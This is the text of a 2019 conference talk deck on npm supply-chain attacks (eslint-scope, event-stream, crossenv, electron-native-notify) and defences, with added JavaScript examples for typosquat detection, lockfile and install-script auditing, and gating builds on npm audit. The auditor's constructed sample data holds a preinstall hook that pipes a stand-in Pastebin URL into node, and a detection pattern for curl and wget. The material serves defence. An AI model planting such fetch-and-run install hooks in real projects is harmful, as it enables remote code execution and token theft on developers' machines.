ALL YOUR PACKAGES ARE BELONG TO US
Protecting your npm dependencies
@CHRISLAUGHLIN
WHO AM I?
Jack of all trades, master of none
Worst hangover I have ever had
STORY TIME
SO WHAT HAPPENED?
I have a confession to make
Incidents
ESLINT-SCOPE
When: July 12th 2018
Impact: ~10,000,000 weekly downloads
Aim: Steal the contents of developers' .npmrc files (which hold npm auth tokens)
Entry: A maintainer's npm account was compromised. The attacker published a new version of the module with an install script that fetched code from Pastebin; that code read .npmrc and sent its contents to the attacker.
Protection:
- Make all contributors enable 2FA
- Ensure that you lock down package versions and use a package-lock file
EVENT-STREAM
When: Discovered November 26th 2018; the malicious code had been in the package for about two months
Impact: ~1,000,000 weekly downloads
Aim: Steal keys from Copay (Dash Copay) bitcoin wallets
Entry: Handover of package access. The original maintainer gave publish rights to a new contributor who offered to help; that contributor added a malicious dependency (flatmap-stream) to the package.
Protection:
- Ensure that you lock down package versions and use a package-lock file
- Rethink how the community manages package ownership?
CROSSENV
When: August 2nd 2017
Impact: ~700 downloads in total (the same attack was used on another 40 packages)
Aim: Steal environment variables (which commonly hold credentials and tokens)
Entry: Typosquatting: packages published under names close to existing ones, here crossenv imitating cross-env
Protection:
- Check the package information (name, author, publish history) before installing
- npm added checks that reject new names that are confusingly close to existing packages
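As an added example (not from the talk), this is the kind of check a project can run on a dependency name before adding it: an edit-distance comparison against a list of packages it already trusts, plus the punctuation-insensitive comparison that catches crossenv vs cross-env. The list of known packages is a small constructed sample, not the registry.

```javascript
// Added example (not from the talk): flag package names that look like
// typosquats of well-known packages, the trick used by the crossenv attack.
// KNOWN_PACKAGES is a small constructed sample standing in for the registry
// or for a project's allow-list of vetted dependencies.

const KNOWN_PACKAGES = ['cross-env', 'react', 'express', 'lodash', 'babel-cli', 'left-pad'];

// Classic Levenshtein edit distance (insert / delete / substitute, cost 1 each),
// computed with a single rolling row.
function levenshtein(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];          // d[i-1][j-1]
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const up = prev[j];        // d[i-1][j]
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(up + 1, prev[j - 1] + 1, diag + cost);
      diag = up;
    }
  }
  return prev[b.length];
}

// Lower-case and drop the separators npm treats as interchangeable, so
// "cross-env", "crossenv" and "cross.env" all collapse to "crossenv".
function normalizeName(name) {
  return name.toLowerCase().replace(/[-._]/g, '');
}

// Returns { suspicious, reason, closest }. An exact match against the known
// list is the legitimate package itself; anything that collides after
// normalisation or sits within maxDistance edits of a known name is flagged.
function checkName(candidate, known = KNOWN_PACKAGES, maxDistance = 1) {
  if (known.includes(candidate)) {
    return { suspicious: false, reason: 'exact match', closest: candidate };
  }
  let closest = null;
  let best = Infinity;
  for (const name of known) {
    if (normalizeName(name) === normalizeName(candidate)) {
      return { suspicious: true, reason: 'same name after punctuation removal', closest: name };
    }
    const d = levenshtein(candidate.toLowerCase(), name.toLowerCase());
    if (d < best) {
      best = d;
      closest = name;
    }
  }
  if (best <= maxDistance) {
    return { suspicious: true, reason: `edit distance ${best} from a known package`, closest };
  }
  return { suspicious: false, reason: 'no close match', closest };
}

// Demo over constructed candidates.
for (const name of ['crossenv', 'cross-env', 'reakt', 'expres', 'my-unique-lib']) {
  const result = checkName(name);
  console.log(`${name}: ${result.suspicious ? 'SUSPICIOUS' : 'ok'} (${result.reason}, closest: ${result.closest})`);
}
```

A distance threshold of 1 is deliberately tight: a larger value starts flagging unrelated short names, so in practice the check is most useful against an allow-list of the packages a team already depends on rather than against the whole registry.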
ELECTRON-NATIVE-NOTIFY
When: June 6th 2019
Impact: ~600 weekly downloads
Aim: Steal cryptocurrency wallet seeds and keys from Komodo's Agama wallet (around $13 million USD in cryptocurrency was exposed)
Entry: The attacker published a useful-looking package, waited for it to be adopted as a dependency, then released a new, malicious version of the now-trusted dependency
Protection:
- Ensure that you lock down package versions and use a package-lock file
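Three of the four incidents above were delivered through an automatically picked-up new version, an install-time script, or a dependency that quietly changed hands. As an added example (not from the talk), the script below audits a project for exactly those exposures: dependency ranges that are not exact pins, dependencies missing from the lockfile, lockfile entries resolved from somewhere other than the public registry, and installed packages that carry preinstall/install/postinstall hooks, with a flag for hooks that fetch remote code. The package.json, package-lock.json (npm 6, lockfileVersion 1 layout) and installed manifests are constructed samples embedded inline; the postinstall commands imitate the eslint-scope pattern and are not the real payload.

```javascript
// Added example (not from the talk): audit a manifest, lockfile and installed
// packages for the weaknesses the incidents exploited. All inputs are
// constructed samples; in practice read them from package.json,
// package-lock.json and node_modules/<name>/package.json.

const packageJson = {
  name: 'demo-app',
  dependencies: {
    'eslint-scope': '^3.7.1',      // caret range: a malicious 3.7.2 would be picked up
    'event-stream': '3.3.4',       // exact pin
    'left-pad': '~1.3.0',          // tilde range
    'some-internal-lib': '1.0.0',  // pinned, but absent from the lockfile below
  },
};

const packageLock = {
  lockfileVersion: 1,
  dependencies: {
    'eslint-scope': { version: '3.7.2', resolved: 'https://registry.npmjs.org/eslint-scope/-/eslint-scope-3.7.2.tgz', integrity: 'sha512-constructed' },
    'event-stream': { version: '3.3.4', resolved: 'https://registry.npmjs.org/event-stream/-/event-stream-3.3.4.tgz', integrity: 'sha512-constructed' },
    'left-pad': { version: '1.3.0', resolved: 'https://mirror.example.net/left-pad-1.3.0.tgz', integrity: 'sha512-constructed' },
  },
};

// What node_modules/<name>/package.json would contain, keyed by name.
// The hook commands are constructed to mimic install-time code fetching.
const installedManifests = {
  'eslint-scope': { version: '3.7.2', scripts: { postinstall: 'node ./lib/build.js' } },
  'event-stream': { version: '3.3.4', scripts: { test: 'tap test/*.js' } },
  'left-pad': { version: '1.3.0', scripts: { preinstall: 'curl -s https://pastebin.example/raw/constructed | node' } },
};

const EXACT_VERSION = /^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$/;   // semver with optional prerelease, no range operator
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall'];
const REMOTE_FETCH = /\b(curl|wget)\b|https?:\/\//i;

// Dependencies declared with a range (^, ~, >, *, x, ||, ...) rather than an exact version.
function findUnpinned(pkg) {
  return Object.entries(pkg.dependencies || {})
    .filter(([, range]) => !EXACT_VERSION.test(range))
    .map(([name, range]) => ({ name, range }));
}

// Declared dependencies with no entry in the lockfile: their version is decided at install time.
function findMissingFromLock(pkg, lock) {
  const locked = lock.dependencies || {};
  return Object.keys(pkg.dependencies || {}).filter((name) => !(name in locked));
}

// Lockfile entries whose tarball does not come from the expected registry host.
function findNonRegistryResolutions(lock, registryHost = 'registry.npmjs.org') {
  return Object.entries(lock.dependencies || {})
    .filter(([, entry]) => !entry.resolved || new URL(entry.resolved).host !== registryHost)
    .map(([name, entry]) => ({ name, resolved: entry.resolved }));
}

// Installed packages that run code at install time, with a flag for commands that reach out to the network.
function findInstallScripts(manifests) {
  const hits = [];
  for (const [name, manifest] of Object.entries(manifests)) {
    for (const hook of LIFECYCLE_HOOKS) {
      const command = manifest.scripts && manifest.scripts[hook];
      if (command) hits.push({ name, hook, command, fetchesRemote: REMOTE_FETCH.test(command) });
    }
  }
  return hits;
}

function auditProject(pkg, lock, manifests) {
  return {
    unpinned: findUnpinned(pkg),
    missingFromLock: findMissingFromLock(pkg, lock),
    nonRegistry: findNonRegistryResolutions(lock),
    installScripts: findInstallScripts(manifests),
  };
}

const report = auditProject(packageJson, packageLock, installedManifests);
console.log(JSON.stringify(report, null, 2));
```

A postinstall hook is not malicious in itself (native modules need one), so the output is a review list rather than a verdict; the useful policy is to install with --ignore-scripts in CI and then deliberately allow the handful of packages that genuinely need their hooks.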
tools & workflows
npm audit
- Added in npm v6
- Runs automatically after each npm install
- Covers dev, bundled and optional dependencies as well as regular ones
- Fix automatically by running npm audit fix, or run the recommended commands by hand
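To make npm audit bite in CI rather than just print a summary, a build can parse the machine-readable output and fail above a chosen severity. As an added example (not from the talk), the script below does that over a constructed report in the npm 6 JSON layout that this deck's tooling section refers to (advisories keyed by id, each with module_name, severity and findings; metadata.vulnerabilities with per-severity counts); the advisory ids, package names and titles are placeholders, not real advisories. It also skips advisories that only reach the project through dev dependencies when asked, since a vulnerability in a test runner does not ship to production.

```javascript
// Added example (not from the talk): gate a build on `npm audit --json` output.
// sampleAuditJson is a constructed report in the npm 6 layout; in practice you
// would feed in the real output of `npm audit --json`.

const SEVERITY_RANK = { info: 0, low: 1, moderate: 2, high: 3, critical: 4 };

const sampleAuditJson = JSON.stringify({
  advisories: {
    '1001': {
      id: 1001, module_name: 'pkg-a', severity: 'high', title: 'Prototype pollution (constructed)',
      findings: [{ version: '1.0.0', paths: ['test-runner>pkg-a'], dev: true }],
    },
    '1002': {
      id: 1002, module_name: 'pkg-b', severity: 'low', title: 'Regular expression DoS (constructed)',
      findings: [{ version: '2.3.4', paths: ['pkg-b'], dev: false }],
    },
  },
  metadata: { vulnerabilities: { info: 0, low: 1, moderate: 0, high: 1, critical: 0 } },
});

// Parse and sanity-check the report shape so a truncated or non-audit JSON blob
// fails loudly instead of being read as "no advisories".
function parseAuditReport(jsonText) {
  const report = JSON.parse(jsonText);
  if (!report || typeof report.advisories !== 'object' || report.advisories === null) {
    throw new Error('not an npm 6 audit report: missing "advisories"');
  }
  return report;
}

// Advisories at or above the threshold. Unknown severity strings are kept
// (fail safe). With includeDev=false, advisories whose every finding is a
// dev-only path are dropped.
function advisoriesAtOrAbove(report, threshold, { includeDev = true } = {}) {
  if (!(threshold in SEVERITY_RANK)) throw new Error(`unknown severity threshold: ${threshold}`);
  const min = SEVERITY_RANK[threshold];
  return Object.values(report.advisories).filter((adv) => {
    const rank = SEVERITY_RANK[adv.severity];
    if (rank === undefined) return true;
    if (rank < min) return false;
    if (includeDev) return true;
    return (adv.findings || []).some((f) => !f.dev);
  });
}

function shouldFailBuild(report, threshold, options) {
  return advisoriesAtOrAbove(report, threshold, options).length > 0;
}

// Count advisories by severity from the advisories themselves, not from
// metadata, so the summary still holds if metadata is absent.
function summarize(report) {
  const counts = { info: 0, low: 0, moderate: 0, high: 0, critical: 0 };
  for (const adv of Object.values(report.advisories)) {
    if (adv.severity in counts) counts[adv.severity] += 1;
  }
  return counts;
}

const audit = parseAuditReport(sampleAuditJson);
console.log('summary:', summarize(audit));
for (const adv of advisoriesAtOrAbove(audit, 'low')) {
  console.log(`${adv.severity.padEnd(8)} ${adv.module_name}: ${adv.title}`);
}
console.log('fail at high (all deps):', shouldFailBuild(audit, 'high'));
console.log('fail at high (prod only):', shouldFailBuild(audit, 'high', { includeDev: false }));
```

npm's own --audit-level flag covers the severity cut-off; the dev-only filter and the shape check are the parts a CI job usually has to add itself.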
Snyk.io
- Cloud based solution
- Integration with multiple source control solutions
- On demand or scheduled vulnerability scanning
- Weekly reports
- Dashboard
github
- Security alerts linked to your GitHub source
- Growing vulnerability database
- Potential integration with GitHub's new package registry
conclusion
Questions?
NIDC 2019 - All your packages are belong to us
By Chris Laughlin